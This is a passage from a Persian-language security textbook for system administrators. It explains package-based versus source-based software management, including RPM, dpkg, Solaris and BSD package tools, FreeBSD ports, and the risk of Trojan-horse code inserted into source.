ﺑﻤﺎﻧﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺍﻣﻨﻴﺘﻲ ﺣﻴـﺎﺗﻲ ﻭ ﺑـﺮﺍﻱ ﺍﺭﺗﻘﺎﻫـﺎﻱ
ﻏﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻔﻴﺪ ﺍﺳﺖ.
ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Windows NTﻧﻮﻋﻲ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑـﺮﺍﻱ ﺍﺟـﺰﺍﻱ ﻣﺮﻛـﺰﻱ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﺎ ﺁﻧﻬﺎ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻣﺘـﺪﺍﻭﻟﺘﺮﻳﻦ ﺭﻭﺵ ،ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ "ﺑـﺴﺘﻪﻫـﺎﻱ
ﻣﺪﻳﺮﻳﺘﻲ" -ﻓﺎﻳﻠﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭ ﻗﺎﺑﻞ ﺍﺟﺮﺍﻱ ﺍﺯ ﭘﻴﺶ ﺗﺮﺟﻤﻪﺷﺪﻩ -ﺍﺳﺖ ﻛﻪ ﺧﻮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺑﺮﺭﺳﻲ ﺳﻴﺴﺘﻢ ﻣﺘﻮﺟﻪ ﺷﻮﻧﺪ ﻛﺪﺍﻣﻴﻚ ﺍﺯ
ﻓﺎﻳﻠﻬﺎﻱ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺼﺐ ﺷﻮﻧﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ
ﻼ ﺗﺮﺟﻤﻪ ﺷﺪﻩﺍﻧـﺪ ،ﻫﻤـﺮﺍﻩ ﻫﺮﮔﻮﻧـﻪ ﻓﺎﻳﻠﻬـﺎﻱ
ﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ،ﻓﺎﻳﻠﻲ ﺷﺎﻣﻞ ﻳﻚ ﺩﺳﺘﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺍﺳﺖ ﻛﻪ ﻗﺒ ﹰ
ﻳﻚ ﻓﺎﻳﻞ ﻧﻮﻋ ﹺ
ﻣﺮﺗﺒﻂ ﺍﺯ ﻗﺒﻴﻞ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ،ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﭘﻴﺶﻓﺮﺽ ،ﻭ ﻣﺴﺘﻨﺪﺍﺕ .ﺗﺤﺖ ﺍﻏﻠﺐ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ،ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺍﺭﺍﻱ
ﻓﺮﺍﺩﺍﺩﻩﻫﺎﻳﻲ ١٠٨ﻣﺎﻧﻨﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻧﻴﺰ ﻫﺴﺖ:
• ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﮕﺎﺭﺵ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺭ ﺁﻥ ﺑﺴﺘﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؛
• ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺴﺨﻪﻫﺎﻱ ﺳﺎﺯﮔﺎﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳﺎ ﻣﻌﻤﺎﺭﻱﻫﺎﻱ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ؛
• ﻓﻬﺮﺳﺖ ﺳﺎﻳﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﻳﻦ ﺑﺴﺘﻪ ﺁﻧﻬﺎ ﺭﺍ ﻻﺯﻡ ﺩﺍﺭﺩ؛
• ﻓﻬﺮﺳﺖ ﺳﺎﻳﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﻳﻦ ﺑﺴﺘﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﺗﻌﺎﺭﺽ ﺍﺳﺖ؛
• ﻓﻬﺮﺳﺖ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﻓﺎﻳﻠﻬﺎ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻫﺴﺘﻨﺪ )ﻳﺎ ﻓﻬﺮﺳﺖ ﻓﺎﻳﻠﻬﺎﻳﻲ ﮐﻪ ﮐﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﺗﻐﻴﻴﺮ ﺩﻫﺪ(؛ ﻭ
• ﻓﺮﺍﻣﻴﻨﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﻗﺒﻞ ،ﺩﺭ ﺧﻼﻝ ،ﻭ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺴﺘﻪ ﺍﺟﺮﺍ ﺷﻮﻧﺪ.
ﺟﺰﺀ ﻣﻬﻢ ﺩﻳﮕﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ،ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻧﺴﺨﻪﻫﺎﻱ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﺍﺳـﺖ ﻛـﻪ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ﻧـﺼﺐ
ﺷﺪﻩﺍﻧﺪ .ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ Windowsﻏﺎﻟﺒﹰﺎ Registeryﺍﻳﻦ ﻫﺪﻑ ﺭﺍ ﺗﺄﻣﻴﻦ ﻣﻲﻛﻨﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺳﺎﺩﻩ ﺍﺳﺖ .ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻳﻚ ﻳﺎ ﺩﻭ ﻓﺮﻣﺎﻥ ﺳﺎﺩﻩ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺟﺪﻳـﺪ ﺭﺍ
ﻧﺼﺐ ﻳﺎ ﻭﻗﺘﻲ ﻳﻚ ﻧﺴﺨﻪ ﺟﺪﻳﺪ ﻳﺎ ﺍﺻﻼﺡﺷﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻓﻌﻠﻲ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﺪ .ﭼﻮﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﻗﺒـﻞ
ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺴﺘﺮ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺗﺮﺟﻤﻪ ﺷﺪﻩﺍﻧﺪ ،ﻻﺯﻡ ﻧﻴﺴﺖ ﺭﺍﻫﺒﺮ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪ ﻭﻗﺖ ﺻﺮﻑ ﻛﻨﺪ.
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻌﻤﻮﻝ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧـﻪ ﻟﺰﻭﻣـﹰﺎ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺷـﻤﺎ ﺗﺮﺟﻤـﻪ
ﺷﺪﻩﺍﻧﺪ .ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺘﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﻧﻮﻉ ﺧﺎﺻﻲ ﺍﺯ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ،ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﻻ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ -ﭼﻨﺎﻧﭽـﻪ ﺩﺭ
ﻏﻴﺮﻋﺎﺩﻱ ﺳﺎﺯﮔﺎﺭ ﻧﻤﺎﺋﻴﺪ ،ﻳﺎ ﺍﮔﺮ ﺗﻨﻬﺎ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺎ ﻳﻚ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻟﺨـﻮﺍﻩ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ ،ﺍﺣﺘﻤـﺎ ﹰ
ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ -ﺑﻴﺸﺘﺮ ﺑﻪ ﻛﺎﺭ ﺷﻤﺎ ﻣﻲﺁﻳﺪ .ﻫﺴﺘﺔ ﺍﺻﻠﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ Unixﻧﻤﻮﻧﺔ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺳﺖ.
ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺵ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﻨﺎﺳـﺒﺘﺮ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ
ﺩﻳﮕﺮ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ Solarix 2.xﻓﺮﺍﻣﻴﻦ ) showren ،pkginfo ،pkgrm ،pkgaddﻭ ﺳـﺎﻳﺮ ﻓـﺮﺍﻣﻴﻦ ﻣـﺸﺎﺑﻪ( ﺭﺍ ﺑـﺮﺍﻱ
ﺍﺿﺎﻓﻪ ،ﺣﺬﻑ ،ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﻭﺿﻌﻴﺖ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﭘﻮﺳﺘﻪ ،ﻭ ﻓﺮﻣﺎﻥ admintoolﺭﺍ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ
ﮔﺮﺍﻓﻴﻜﻲ ﻓﺮﺍﻫﻢ ﻛـﺮﺩﻩ ﺍﺳـﺖ .ﺳﻴـﺴﺘﻤﻬﺎﻱ Windowsﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ WindowsUpdateﺑـﺮﺍﻱ downloadﻭ ﻧـﺼﺐ ﻣـﻮﺍﺭﺩ
ﺍﺻﻼﺣﺎﺕ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺗﺴﻬﻴﻼﺕ ﻣﺮﻛﺰﻱ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ.
108 Metadata
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣٠١
ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﻨﻬﺎ ﻣﺨﺼﻮﺹ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺖ .ﺗﻮﺯﻳﻌﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Unixﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻧﻴـﺰ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ﺳﺎﺩﻩﺗﺮ ﻛﻨﻨﺪ .ﭼﻨـﺪﻳﻦ ﺗﻮﺯﻳـﻊ ﻣﺒﺘﻨـﻲ ﺑـﺮ ،Linuxﺳﻴـﺴﺘﻢ
ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ١٠٩RPMﺭﺍ ﺑﺮﮔﺰﻳﺪﻩﺍﻧﺪ .ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺯ ﻳﻚ ﻓﺮﻣﺎﻥ rpmﺑﺮﺍﻱ ﺗﻤﺎﻡ ﻛﺎﺭﻫﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺧﻮﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ Debian GNU/Linux .ﺍﺯ ﻳﻚ ﺳﻴـﺴﺘﻢ ﻣـﺪﻳﺮﻳﺖ ﺑـﺴﺘﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺟـﺎﻳﮕﺰﻳﻦ ﺑﻨـﺎﻡ dpkgﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﻣﺒﺘﻨﻲ ﺑﺮ BSDﺭﻭﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ١١٠ﺗﻤﺮﻛﺰ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣـﺎﻝ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺑـﺴﺘﻪﻫـﺎﻱ
ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﭘﻴﺶ ﺗﺮﺟﻤﻪﺷﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻓﺮﺍﻣﻴﻦ ،pkg_delete ،pkg_addﻭ pkg_infoﺍﺩﺍﺭﻩ ﻣﻲﺷﻮﻧﺪ.
ﺳﻴﺴﺘﻢﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ
ﻻ ﺑﺮ ﻛﻤﻚ ﺑﻪ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻳـﻚ
ﺑﺮﺧﻼﻑ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﻣﻌﻤﻮ ﹰ
ﻧﺴﺨﺔ ﺑﻪﺭﻭﺯ ﺷﺪﺓ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳﺎ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ ،ﻛﻪ ﺩﺭ ﺁﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺟﺪﻳﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺮﺟﻤـﻪ ﻭ ﻧـﺼﺐ
ﺷﻮﻧﺪ.
ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﺍﺯ ﭼﻨﺪ ﻣﻨﻈﺮ ﺑﺮ ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﺮﺟﻴﺢ ﺩﺍﺭﺩ :ﻳﻚ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣـﺘﻦ ﺗﻨﻬـﺎ ﺩﺭ
ﻳﻚ ﻧﺴﺨﻪ ﻭﺍﺣﺪ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ ،ﺩﺭ ﻣﻘﺎﺑ ﹺ
ﻞ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﺮﺟﻤﻪ ﺷﺪﻩ ﻛﻪ ﺑﺎﻳﺪ ﺑﻄﻮﺭ ﻣﺠﺰﺍ ﺑﺮﺍﻱ ﻫﺮ ﻣﻌﻤﺎﺭﻱ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ
ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﺗﺮﺟﻤﻪ ﻭ ﺑﺴﺘﻪﺑﻨﺪﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺷﻮﻧﺪ .ﻫﻤﭽﻨﻴﻦ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻻﺯﻡ ﺷﻮﺩ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺤﻠﻲ ﺩﺭ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ
ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ﺗﻨﻬﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ،ﺳﺎﺧﺖ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﺭﻭﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻧﻲ ﮔﻴﺞﻛﻨﻨﺪﻩ ﺑﺎﺷﺪ .ﺍﺯ ﻳـﻚ ﻃـﺮﻑ ﺷـﻤﺎ ﺁﺯﺍﺩ
ﻫﺴﺘﻴﺪ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﺮﺩﻩ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻴﭽﮕﻮﻧﻪ ﺍﺷﻜﺎﻝ ﭘﻨﻬﺎﻥ ﻳﺎ ﺍﺳﺐ ﺗﺮﺍﻭﺍ ﺩﺭ ﺁﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﺩﺭ ﻋﻤﻞ ﺍﻧﺠﺎﻡ ﺍﻳﻦ
ﺑﺮﺭﺳﻲ ﺩﺷﻮﺍﺭ ﺍﺳﺖ ﻭ ﺑﻨﺪﺭﺕ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ؛ ﻭ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺷـﻤﺎ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛﻨـﺪ،
ﺑﺮﺍﻳﺶ ﻣﺸﻜﻞ ﭼﻨﺪﺍﻧﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺳﺐ ﺗﺮﺍﻭﺍﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﻛﻨﺪ! ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻳـﺪ ﺍﻃﻤﻴﻨـﺎﻥ
ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻫﻢ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺗﺮﺟﻤﻪ ﻣﻲﻛﻨﻴﺪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ ،ﻭ ﻫﻢ ﺍﻳﻨﮑﻪ ﻳﻚ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﺔ
ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ.
ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﻭﺻﻠﻪﻫﺎ
ﺑﺮﺍﻱ ﻣﺜﺎﻝ Free BSDﻭ ﻧﺴﺨﻪﻫﺎﻱ Unixﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺭﺍ ﺩﺭ ﻣﺠﻤﻮﻋـﻪ portﻫـﺎﻱ ﺧـﻮﺩ ﻣﻨﺘـﺸﺮ
ﻣﻲﻛﻨﻨﺪ .ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺍﺯ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﻭ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺻﻼﺡﻫﺎﻳﻲ ﻛﻪ ﺍﻋﻤﺎﻝ ﺷﺪﻩﺍﻧﺪ ﺗﺎ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺮﻧﺎﻣﻪ
ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺩﺭ ﻣﺤﻴﻂ BSDﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ .ﻓﺎﻳﻠﻬﺎﻱ ﻗﺎﺑﻞ ﺗﺮﺟﻤﻪ ،ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻣﻲﺳـﺎﺯﻧﺪ ،ﺁﻧـﺮﺍ
ﻧﺼﺐ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺳﭙﺲ ﻓﺎﻳﻠﻬﺎﻱ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑﺎ ﻓﺮﻣﺎﻥ BSDﻣﺮﺑﻮﻃﻪ ) (pkg_oddﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ FreeBSD
ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﻣﻴﺰﺍﻥ ﻭﺳﻴﻌﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ.
109 RPM Package Management
110 Source-Based Updates
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﻢ ﻭ ﻫﺮﮔـﺎﻩ ﻛـﻪ
ﻻ ﺑﻪ ﺷـﻜﻞ ﻳـﻚ patch
ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﺪ ﺁﻧﺮﺍ ﻣﺠﺪﺩﹰﺍ ﺗﺮﺟﻤﻪ ﻧﻤﺎﻳﻴﻢ .ﻭﻗﺘﻲ ﻳﻚ ﺍﺻﻼﺡ ﺑﺮﺍﻱ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﺩ ،ﻣﻌﻤﻮ ﹰ
